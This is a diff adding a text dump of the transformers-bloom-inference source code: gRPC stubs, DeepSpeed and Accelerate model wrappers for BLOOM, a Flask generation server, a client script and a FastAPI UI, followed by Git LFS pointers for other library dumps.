+ def Forward(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None):
766
+ return grpc.experimental.unary_unary(request, target, '/generation.GenerationService/Forward', generation__pb2.ForwardRequestProto.SerializeToString, generation__pb2.ForwardResponseProto.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
767
+
768
+ # File: transformers-bloom-inference-main/inference_server/model_handler/launch.py
769
+ """"""
770
+ import argparse
771
+ import torch.distributed as dist
772
+ from ..models import get_model_class, start_inference_engine
773
+ from ..utils import get_argument_parser, parse_args
774
+ from .grpc_utils.generation_server import serve
775
+
776
+ def get_args() -> argparse.Namespace:
777
+ parser = get_argument_parser()
778
+ group = parser.add_argument_group(title='launch config')
779
+ group.add_argument('--local_rank', required=False, type=int, help='used by dist launchers')
780
+ group.add_argument('--cpu_offload', action='store_true', help='whether to activate CPU offload for DS ZeRO')
781
+ group.add_argument('--ports', nargs='+', help='GRPC ports')
782
+ args = parse_args(parser)
783
+ return args
784
+
785
+ def main():
786
+ args = get_args()
787
+ start_inference_engine(args.deployment_framework)
788
+ model = get_model_class(args.deployment_framework)(args)
789
+ serve(model, args.ports[dist.get_rank()])
790
+ if __name__ == '__main__':
791
+ main()
792
+
793
+ # File: transformers-bloom-inference-main/inference_server/models/__init__.py
794
+ from ..constants import DS_INFERENCE, DS_ZERO, HF_ACCELERATE, HF_CPU
795
+ from .model import Model, get_hf_model_class, load_tokenizer
796
+
797
+ def get_model_class(deployment_framework: str):
798
+ if deployment_framework == HF_ACCELERATE:
799
+ from .hf_accelerate import HFAccelerateModel
800
+ return HFAccelerateModel
801
+ elif deployment_framework == HF_CPU:
802
+ from .hf_cpu import HFCPUModel
803
+ return HFCPUModel
804
+ elif deployment_framework == DS_INFERENCE:
805
+ from .ds_inference import DSInferenceModel
806
+ return DSInferenceModel
807
+ elif deployment_framework == DS_ZERO:
808
+ from .ds_zero import DSZeROModel
809
+ return DSZeROModel
810
+ else:
811
+ raise ValueError(f'Unknown deployment framework {deployment_framework}')
812
+
813
+ def start_inference_engine(deployment_framework: str) -> None:
814
+ if deployment_framework in [DS_INFERENCE, DS_ZERO]:
815
+ import deepspeed
816
+ deepspeed.init_distributed('nccl')
817
+
818
+ # File: transformers-bloom-inference-main/inference_server/models/ds_inference.py
819
+ import glob
820
+ import io
821
+ import json
822
+ import os
823
+ from argparse import Namespace
824
+ from functools import partial
825
+ import torch
826
+ import deepspeed
827
+ from huggingface_hub import try_to_load_from_cache
828
+ from transformers import AutoConfig
829
+ from ..utils import get_world_size, run_rank_n
830
+ from .model import Model, get_hf_model_class
831
+
832
+ class DSInferenceModel(Model):
833
+
834
+ def __init__(self, args: Namespace) -> None:
835
+ super().__init__(args)
836
+ with deepspeed.OnDevice(dtype=torch.float16, device='meta'):
837
+ self.model = get_hf_model_class(args.model_class).from_config(AutoConfig.from_pretrained(args.model_name), torch_dtype=torch.bfloat16)
838
+ self.model = self.model.eval()
839
+ downloaded_model_path = get_model_path(args.model_name)
840
+ if args.dtype in [torch.float16, torch.int8]:
841
+ checkpoints_json = os.path.join(downloaded_model_path, 'ds_inference_config.json')
842
+ if os.path.isfile(checkpoints_json):
843
+ self.model = deepspeed.init_inference(self.model, mp_size=get_world_size(), base_dir=downloaded_model_path, dtype=args.dtype, checkpoint=checkpoints_json, replace_with_kernel_inject=True)
844
+ else:
845
+ with TemporaryCheckpointsJSON(downloaded_model_path) as checkpoints_json:
846
+ self.model = deepspeed.init_inference(self.model, mp_size=get_world_size(), base_dir=downloaded_model_path, dtype=args.dtype, checkpoint=checkpoints_json, replace_with_kernel_inject=True)
847
+ elif args.dtype == torch.bfloat16:
848
+ raise NotImplementedError('bfloat16 is not yet supported')
849
+ self.model = self.model.module
850
+ self.input_device = torch.cuda.current_device()
851
+ self.post_init(args.model_name)
852
+
853
+ class TemporaryCheckpointsJSON:
854
+
855
+ def __init__(self, model_path: str):
856
+ self.tmp_directory = 'tmp'
857
+ self.tmp_file = os.path.join(self.tmp_directory, 'checkpoints.json')
858
+ self.model_path = model_path
859
+
860
+ def write_checkpoints_json(self) -> None:
861
+ print(self.model_path)
862
+ with io.open(self.tmp_file, 'w', encoding='utf-8') as f:
863
+ data = {'type': 'BLOOM', 'checkpoints': glob.glob(f'{self.model_path}/*.bin'), 'version': 1.0}
864
+ json.dump(data, f)
865
+
866
+ def __enter__(self):
867
+ run_rank_n(os.makedirs, barrier=True)(self.tmp_directory, exist_ok=True)
868
+ run_rank_n(self.write_checkpoints_json, barrier=True)()
869
+ return self.tmp_file
870
+
871
+ def __exit__(self, type, value, traceback):
872
+ return
873
+
874
+ def get_model_path(model_name: str):
875
+ try:
876
+ config_file = 'config.json'
877
+ config_path = try_to_load_from_cache(model_name, config_file, cache_dir=os.getenv('TRANSFORMERS_CACHE'))
878
+ if config_path is None:
879
+ return model_name
880
+ else:
881
+ return os.path.dirname(config_path)
882
+ except:
883
+ return model_name
884
+
885
+ # File: transformers-bloom-inference-main/inference_server/models/ds_zero.py
886
+ from argparse import Namespace
887
+ import torch
888
+ import deepspeed
889
+ from transformers import AutoConfig
890
+ from transformers.deepspeed import HfDeepSpeedConfig
891
+ from ..utils import get_world_size
892
+ from .model import Model, get_hf_model_class
893
+
894
+ class DSZeROModel(Model):
895
+
896
+ def __init__(self, args: Namespace) -> None:
897
+ super().__init__(args)
898
+ config = AutoConfig.from_pretrained(args.model_name)
899
+ train_micro_batch_size_per_gpu = 1
900
+ train_batch_size = train_micro_batch_size_per_gpu * get_world_size()
901
+ ds_config = {'fp16': {'enabled': args.dtype == torch.float16}, 'bf16': {'enabled': args.dtype == torch.bfloat16}, 'zero_optimization': {'stage': 3, 'overlap_comm': True, 'contiguous_gradients': True, 'reduce_bucket_size': config.hidden_size * config.hidden_size, 'stage3_prefetch_bucket_size': 0.9 * config.hidden_size * config.hidden_size, 'stage3_param_persistence_threshold': 0}, 'steps_per_print': 2000, 'train_batch_size': train_batch_size, 'train_micro_batch_size_per_gpu': train_micro_batch_size_per_gpu, 'wall_clock_breakdown': False}
902
+ if args.cpu_offload:
903
+ ds_config['zero_optimization']['offload_param'] = {'device': 'cpu', 'pin_memory': True}
904
+ dschf = HfDeepSpeedConfig(ds_config)
905
+ self.model = get_hf_model_class(args.model_class).from_pretrained(args.model_name, torch_dtype=args.dtype)
906
+ self.model = self.model.eval()
907
+ self.model = deepspeed.initialize(model=self.model, config_params=ds_config)[0]
908
+ self.model.module.eval()
909
+ self.model = self.model.module
910
+ self.input_device = torch.cuda.current_device()
911
+ self.post_init(args.model_name)
912
+
913
+ # File: transformers-bloom-inference-main/inference_server/models/hf_accelerate.py
914
+ from argparse import Namespace
915
+ import torch
916
+ from ..utils import get_world_size
917
+ from .model import Model, get_hf_model_class
918
+
919
+ class HFAccelerateModel(Model):
920
+
921
+ def __init__(self, args: Namespace) -> None:
922
+ super().__init__(args)
923
+ kwargs = {'pretrained_model_name_or_path': args.model_name, 'device_map': 'auto'}
924
+ if get_world_size() > 1:
925
+ kwargs['device_map'] = 'balanced_low_0'
926
+ if args.dtype == torch.int8:
927
+ kwargs['load_in_8bit'] = True
928
+ else:
929
+ kwargs['torch_dtype'] = args.dtype
930
+ self.model = get_hf_model_class(args.model_class).from_pretrained(**kwargs)
931
+ self.model.requires_grad_(False)
932
+ self.model.eval()
933
+ self.input_device = 'cuda:0'
934
+ self.post_init(args.model_name)
935
+
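+ # The from_pretrained() kwargs chosen by HFAccelerateModel above depend on
+ # world size and dtype; a standalone restatement of that selection (torch is
+ # only needed for the dtype constants).
+ import torch
+
+ def accelerate_kwargs(model_name, dtype, world_size):
+     kwargs = {'pretrained_model_name_or_path': model_name, 'device_map': 'auto'}
+     if world_size > 1:
+         kwargs['device_map'] = 'balanced_low_0'
+     if dtype == torch.int8:
+         kwargs['load_in_8bit'] = True
+     else:
+         kwargs['torch_dtype'] = dtype
+     return kwargs
+
+ print(accelerate_kwargs('bigscience/bloom', torch.float16, world_size=8))
+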
936
+ # File: transformers-bloom-inference-main/inference_server/models/model.py
937
+ import argparse
938
+ import copy
939
+ from typing import List, Union
940
+ import torch
941
+ import transformers
942
+ from transformers import AutoConfig, AutoModelForCausalLM, AutoModelForSeq2SeqLM, AutoTokenizer, GenerationConfig
943
+ from ..utils import ForwardRequest, ForwardResponse, GenerateRequest, GenerateResponse, TokenizeRequest, TokenizeResponse
944
+
945
+ class Model:
946
+
947
+ def __init__(self, args: argparse.Namespace) -> None:
948
+ self.model = None
949
+ self.input_device = None
950
+ self.max_input_length = args.max_input_length
951
+ self.max_batch_size = args.max_batch_size
952
+
953
+ def post_init(self, model_name: str) -> None:
954
+ self.is_encoder_decoder = AutoConfig.from_pretrained(model_name).is_encoder_decoder
955
+ self.generation_config = GenerationConfig.from_model_config(AutoConfig.from_pretrained(model_name))
956
+ self.tokenizer = load_tokenizer(model_name)
957
+ self.pad = self.tokenizer.pad_token_id
958
+ self.prefix_token_id = self.tokenizer('A')['input_ids'][0]
959
+
960
+ def get_generation_config(self, request: GenerateRequest) -> GenerationConfig:
961
+ generation_config = copy.deepcopy(self.generation_config)
962
+ request = dict(request)
963
+ request_filtered = {}
964
+ for (key, value) in request.items():
965
+ if value is not None and key not in ['text', 'remove_input_from_output']:
966
+ request_filtered[key] = value
967
+ request_filtered['return_dict_in_generate'] = True
968
+ generation_config.update(**request_filtered)
969
+ return generation_config
970
+
971
+ def generate(self, request: GenerateRequest) -> Union[GenerateResponse, Exception]:
972
+ try:
973
+ batch_size = len(request.text)
974
+ check_batch_size(batch_size, self.max_batch_size)
975
+ input_tokens = self.tokenizer(request.text, return_tensors='pt', padding=True)
976
+ max_input_length_in_batch = input_tokens.input_ids[0].shape[0]
977
+ check_max_input_length(max_input_length_in_batch, self.max_input_length)
978
+ for t in input_tokens:
979
+ if torch.is_tensor(input_tokens[t]):
980
+ input_tokens[t] = input_tokens[t].to(self.input_device)
981
+ num_input_tokens = input_tokens['input_ids'].shape[1]
982
+ generation_config = self.get_generation_config(request)
983
+ output = self.model.generate(**input_tokens, generation_config=generation_config)
984
+ output_tokens = output.sequences
985
+ if self.is_encoder_decoder:
986
+ num_generated_tokens = (output_tokens != self.pad).sum(dim=-1).tolist()
987
+ generated_text = self.tokenizer.batch_decode(output_tokens, skip_special_tokens=True)
988
+ else:
989
+ generated_tokens = output_tokens[:, num_input_tokens:]
990
+ num_generated_tokens = (generated_tokens != self.pad).sum(dim=-1).tolist()
991
+ if request.remove_input_from_output:
992
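+ # prepend a known token ('A') before decoding so the tokenizer preserves the leading whitespace of the generated continuation; its first character is stripped below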
+ prefix_to_add = torch.tensor([[self.prefix_token_id]] * batch_size).to(self.input_device)
993
+ generated_tokens = torch.cat([prefix_to_add, generated_tokens], dim=1)
994
+ generated_text = self.tokenizer.batch_decode(generated_tokens, skip_special_tokens=True)
995
+ generated_text = [i[1:] for i in generated_text]
996
+ else:
997
+ generated_text = self.tokenizer.batch_decode(output_tokens, skip_special_tokens=True)
998
+ return GenerateResponse(text=generated_text, num_generated_tokens=num_generated_tokens, is_encoder_decoder=self.is_encoder_decoder)
999
+ except Exception as exception:
1000
+ return exception
1001
+
1002
+ def forward(self, request: ForwardRequest) -> Union[ForwardResponse, Exception]:
1003
+
1004
+ def prepare_tensors(conditioning_tokens: List[List[int]], response_tokens: List[List[int]]):
1005
+ bs = len(conditioning_tokens)
1006
+ input_ids = [conditioning_tokens[i] + response_tokens[i] for i in range(bs)]
1007
+ attention_mask = [[1] * (len(conditioning_tokens[i]) + len(response_tokens[i])) for i in range(bs)]
1008
+ labels = [[-100] * len(conditioning_tokens[i]) + response_tokens[i] for i in range(bs)]
1009
+ input_ids = pad(input_ids, self.tokenizer.pad_token_id)
1010
+ attention_mask = pad(attention_mask, 0)
1011
+ labels = pad(labels, -100)
1012
+ return {'input_ids': torch.tensor(input_ids), 'attention_mask': torch.tensor(attention_mask), 'labels': torch.tensor(labels)}
1013
+
1014
+ def pad(arrays: list, padding: int, max_length: int=None):
1015
+ if max_length is None:
1016
+ max_length = max(list(map(len, arrays)))
1017
+ arrays = [[padding] * (max_length - len(array)) + array for array in arrays]
1018
+ return arrays
1019
+ try:
1020
+ batch_size = len(request.conditioning_text)
1021
+ check_batch_size(batch_size, self.max_batch_size)
1022
+ conditioning_tokens = self.tokenizer(request.conditioning_text)['input_ids']
1023
+ response_tokens = self.tokenizer(request.response)['input_ids']
1024
+ max_length_in_batch = max((len(c) + len(r) for (c, r) in zip(conditioning_tokens, response_tokens)))
1025
+ check_max_input_length(max_length_in_batch, self.max_input_length)
1026
+ input_tokens = prepare_tensors(conditioning_tokens, response_tokens)
1027
+ for t in input_tokens:
1028
+ if torch.is_tensor(input_tokens[t]):
1029
+ input_tokens[t] = input_tokens[t].to(self.input_device)
1030
+ loss = self.model(**input_tokens).loss
1031
+ return ForwardResponse(nll=loss.item(), is_encoder_decoder=self.is_encoder_decoder)
1032
+ except Exception as exception:
1033
+ return exception
1034
+
1035
+ def tokenize(self, request: TokenizeRequest) -> TokenizeResponse:
1036
+ return TokenizeResponse(token_ids=self.tokenizer(request.text).input_ids, is_encoder_decoder=self.is_encoder_decoder)
1037
+
1038
+ def check_max_input_length(input_token_length: int, max_input_length: int) -> None:
1039
+ if max_input_length is None:
1040
+ return
1041
+ if input_token_length > max_input_length:
1042
+ raise Exception(f'max supported input length = {max_input_length} for now')
1043
+
1044
+ def check_batch_size(batch_size: int, max_batch_size: int) -> None:
1045
+ if max_batch_size is None:
1046
+ return
1047
+ if batch_size > max_batch_size:
1048
+ raise Exception(f'max supported batch size = {max_batch_size} for now')
1049
+
1050
+ def get_hf_model_class(model_class: str) -> Union[AutoModelForCausalLM, AutoModelForSeq2SeqLM]:
1051
+ return getattr(transformers, model_class)
1052
+
1053
+ def load_tokenizer(model_name: str) -> AutoTokenizer:
1054
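+ # left padding is required for batched generation with decoder-only models so that generated tokens directly follow each prompt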
+ tokenizer = AutoTokenizer.from_pretrained(model_name, padding_side='left')
1055
+ if tokenizer.pad_token_id is None:
1056
+ tokenizer.add_special_tokens({'pad_token': '[PAD]'})
1057
+ return tokenizer
1058
+
1059
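A rough sketch of how a Model subclass is driven, assuming the GenerateRequest / GenerateResponse pydantic models from the package's utils module (not included in this dump); only fields that generate() above actually reads are used, and the model instance is assumed to be built as in the earlier HFAccelerateModel sketch.
    from inference_server.utils import GenerateRequest  # path assumed from the relative imports above
    request = GenerateRequest(text=['DeepSpeed is a machine learning framework'], max_new_tokens=40, remove_input_from_output=True)
    response = model.generate(request)   # `model` is an instantiated Model subclass
    if isinstance(response, Exception):  # generate() returns exceptions instead of raising them
        raise response
    print(response.text, response.num_generated_tokens)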
+ # File: transformers-bloom-inference-main/inference_server/server.py
1060
+ import os
1061
+ from functools import partial
1062
+ from flask import Flask, request
1063
+ from flask_api import status
1064
+ from pydantic import BaseModel
1065
+ from .constants import HF_ACCELERATE
1066
+ from .model_handler.deployment import ModelDeployment
1067
+ from .utils import ForwardRequest, GenerateRequest, TokenizeRequest, get_exception_response, get_num_tokens_to_generate, get_torch_dtype, parse_bool, run_and_log_time
1068
+
1069
+ class QueryID(BaseModel):
1070
+ generate_query_id: int = 0
1071
+ tokenize_query_id: int = 0
1072
+ forward_query_id: int = 0
1073
+
1074
+ class Args:
1075
+
1076
+ def __init__(self) -> None:
1077
+ self.deployment_framework = os.getenv('DEPLOYMENT_FRAMEWORK', HF_ACCELERATE)
1078
+ self.model_name = os.getenv('MODEL_NAME')
1079
+ self.model_class = os.getenv('MODEL_CLASS')
1080
+ self.dtype = get_torch_dtype(os.getenv('DTYPE'))
1081
+ self.allowed_max_new_tokens = int(os.getenv('ALLOWED_MAX_NEW_TOKENS', 100))
1082
+ self.max_input_length = int(os.getenv('MAX_INPUT_LENGTH', 512))
1083
+ self.max_batch_size = int(os.getenv('MAX_BATCH_SIZE', 4))
1084
+ self.debug = parse_bool(os.getenv('DEBUG', 'false'))
1085
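+ # configuration is read entirely from environment variables: DEPLOYMENT_FRAMEWORK (defaults to HF_ACCELERATE), MODEL_NAME, MODEL_CLASS, DTYPE, ALLOWED_MAX_NEW_TOKENS, MAX_INPUT_LENGTH, MAX_BATCH_SIZE and DEBUG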
+ args = Args()
1086
+ model = ModelDeployment(args, True)
1087
+ query_ids = QueryID()
1088
+ app = Flask(__name__)
1089
+
1090
+ @app.route('/query_id/', methods=['GET'])
1091
+ def query_id():
1092
+ return (query_ids.dict(), status.HTTP_200_OK)
1093
+
1094
+ @app.route('/tokenize/', methods=['POST'])
1095
+ def tokenize():
1096
+ try:
1097
+ x = request.get_json()
1098
+ x = TokenizeRequest(**x)
1099
+ (response, total_time_taken) = run_and_log_time(partial(model.tokenize, request=x))
1100
+ response.query_id = query_ids.tokenize_query_id
1101
+ query_ids.tokenize_query_id += 1
1102
+ response.total_time_taken = '{:.2f} msecs'.format(total_time_taken * 1000)
1103
+ return (response.dict(), status.HTTP_200_OK)
1104
+ except Exception:
1105
+ response = get_exception_response(query_ids.tokenize_query_id, args.debug)
1106
+ query_ids.tokenize_query_id += 1
1107
+ return (response, status.HTTP_500_INTERNAL_SERVER_ERROR)
1108
+
1109
+ @app.route('/generate/', methods=['POST'])
1110
+ def generate():
1111
+ try:
1112
+ x = request.get_json()
1113
+ x = GenerateRequest(**x)
1114
+ x.max_new_tokens = get_num_tokens_to_generate(x.max_new_tokens, args.allowed_max_new_tokens)
1115
+ (response, total_time_taken) = run_and_log_time(partial(model.generate, request=x))
1116
+ response.query_id = query_ids.generate_query_id
1117
+ query_ids.generate_query_id += 1
1118
+ response.total_time_taken = '{:.2f} secs'.format(total_time_taken)
1119
+ return (response.dict(), status.HTTP_200_OK)
1120
+ except Exception:
1121
+ response = get_exception_response(query_ids.generate_query_id, args.debug)
1122
+ query_ids.generate_query_id += 1
1123
+ return (response, status.HTTP_500_INTERNAL_SERVER_ERROR)
1124
+
1125
+ @app.route('/forward/', methods=['POST'])
1126
+ def forward():
1127
+ try:
1128
+ x = request.get_json()
1129
+ x = ForwardRequest(**x)
1130
+ if len(x.conditioning_text) != len(x.response):
1131
+ raise Exception('unequal number of elements in conditioning_text and response arguments')
1132
+ (response, total_time_taken) = run_and_log_time(partial(model.forward, request=x))
1133
+ response.query_id = query_ids.forward_query_id
1134
+ query_ids.forward_query_id += 1
1135
+ response.total_time_taken = '{:.2f} secs'.format(total_time_taken)
1136
+ return (response.dict(), status.HTTP_200_OK)
1137
+ except Exception:
1138
+ response = get_exception_response(query_ids.forward_query_id, args.debug)
1139
+ query_ids.forward_query_id += 1
1140
+ return (response, status.HTTP_500_INTERNAL_SERVER_ERROR)
1141
+
1142
+ # File: transformers-bloom-inference-main/server_request.py
1143
+ import argparse
1144
+ import requests
1145
+
1146
+ def get_args() -> argparse.Namespace:
1147
+ parser = argparse.ArgumentParser()
1148
+ group = parser.add_argument_group(title='launch config')
1149
+ group.add_argument('--host', type=str, required=True, help='host address')
1150
+ group.add_argument('--port', type=int, required=True, help='port number')
1151
+ return parser.parse_args()
1152
+
1153
+ def generate(url: str) -> None:
1154
+ url = url + '/generate/'
1155
+ request_body = {'text': ['DeepSpeed', 'DeepSpeed is a', 'DeepSpeed is a machine', 'DeepSpeed is a machine learning framework'], 'max_new_tokens': 40}
1156
+ response = requests.post(url=url, json=request_body, verify=False)
1157
+ print(response.json(), '\n')
1158
+
1159
+ def tokenize(url: str) -> None:
1160
+ url = url + '/tokenize/'
1161
+ request_body = {'text': ['DeepSpeed is a', 'DeepSpeed is a machine learning framework']}
1162
+ response = requests.post(url=url, json=request_body, verify=False)
1163
+ print(response.json(), '\n')
1164
+
1165
+ def forward(url: str) -> None:
1166
+ url = url + '/forward/'
1167
+ request_body = {'conditioning_text': ['DeepSpeed', 'DeepSpeed is a', 'DeepSpeed is a machine', 'DeepSpeed is a machine learning framework'], 'response': ['DeepSpeed', 'DeepSpeed is a', 'DeepSpeed is a machine', 'DeepSpeed is a machine learning framework']}
1168
+ response = requests.post(url=url, json=request_body, verify=False)
1169
+ print(response.json(), '\n')
1170
+
1171
+ def query_id(url: str) -> None:
1172
+ url = url + '/query_id/'
1173
+ response = requests.get(url=url, verify=False)
1174
+ print(response.json(), '\n')
1175
+
1176
+ def main():
1177
+ args = get_args()
1178
+ url = 'http://{}:{}'.format(args.host, args.port)
1179
+ generate(url)
1180
+ tokenize(url)
1181
+ forward(url)
1182
+ query_id(url)
1183
+ if __name__ == '__main__':
1184
+ main()
1185
+
1186
+ # File: transformers-bloom-inference-main/ui.py
1187
+ import argparse
1188
+ import requests
1189
+ from fastapi import FastAPI, Request
1190
+ from fastapi.middleware.cors import CORSMiddleware
1191
+ from fastapi.responses import HTMLResponse, JSONResponse
1192
+ from fastapi.routing import APIRoute, Mount
1193
+ from fastapi.staticfiles import StaticFiles
1194
+ from fastapi.templating import Jinja2Templates
1195
+ from transformers import AutoTokenizer
1196
+ from uvicorn import run
1197
+
1198
+ def get_args() -> argparse.Namespace:
1199
+ parser = argparse.ArgumentParser()
1200
+ group = parser.add_argument_group(title='launch config')
1201
+ group.add_argument('--ui_host', type=str, default='127.0.0.1', help='host address for UI')
1202
+ group.add_argument('--ui_port', type=int, default=5001, help='port number for UI')
1203
+ group.add_argument('--generation_backend_host', type=str, default='127.0.0.1', help='host address for generation server')
1204
+ group.add_argument('--generation_backend_port', type=int, default=5000, help='port number for generation server')
1205
+ return parser.parse_args()
1206
+
1207
+ class Server:
1208
+
1209
+ def __init__(self, args: argparse.Namespace):
1210
+ self.templates = Jinja2Templates(directory='templates')
1211
+ self.ui_host = args.ui_host
1212
+ self.ui_port = args.ui_port
1213
+ self.generation_backend_host = args.generation_backend_host
1214
+ self.generation_backend_port = args.generation_backend_port
1215
+ self.workers = 1
1216
+ self.tokenizer = AutoTokenizer.from_pretrained('bigscience/bloom')
1217
+ self.app = FastAPI(routes=[APIRoute('/', self.homepage, methods=['GET'], response_class=HTMLResponse), APIRoute('/generate/', self.generate, methods=['POST']), Mount('/static/', StaticFiles(directory='static'), name='static')], timeout=600)
1218
+ self.prefix_checkpoints_list = None
1219
+
1220
+ def homepage(self, request: Request) -> HTMLResponse:
1221
+ return self.templates.TemplateResponse('index.html', {'request': request})
1222
+
1223
+ def generate(self, request: dict) -> JSONResponse:
1224
+ response = requests.post(f'http://{self.generation_backend_host}:{self.generation_backend_port}/generate', json=request, verify=False)
1225
+ return JSONResponse(content=response.json())
1226
+
1227
+ def run(self):
1228
+ self.app.add_middleware(CORSMiddleware, allow_origins=['*'], allow_credentials=True, allow_methods=['*'], allow_headers=['*'])
1229
+ run(self.app, host=self.ui_host, port=self.ui_port, workers=self.workers)
1230
+
1231
+ def main() -> None:
1232
+ Server(get_args()).run()
1233
+ if __name__ == '__main__':
1234
+ main()
1235
+
huggingface_transformers.txt ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:96463b4eac366e4845986ebecddde94c861630a3a1f135e63c0b4e1026a53f3a
3
+ size 27122779
huggingface_trl.txt ADDED
The diff for this file is too large to render. See raw diff
 
python_libs_keras.txt ADDED
The diff for this file is too large to render. See raw diff
 
python_libs_matplotlib.txt ADDED
The diff for this file is too large to render. See raw diff
 
python_libs_numpy.txt ADDED
The diff for this file is too large to render. See raw diff
 
python_libs_opencv.txt ADDED
The diff for this file is too large to render. See raw diff
 
python_libs_pandas.txt ADDED
The diff for this file is too large to render. See raw diff
 
python_libs_plotly.py.txt ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:d8b9db0e0de5edf32a81e5fd18a8ac35866d75b6528b647051947ed53c32fa57
3
+ size 19767758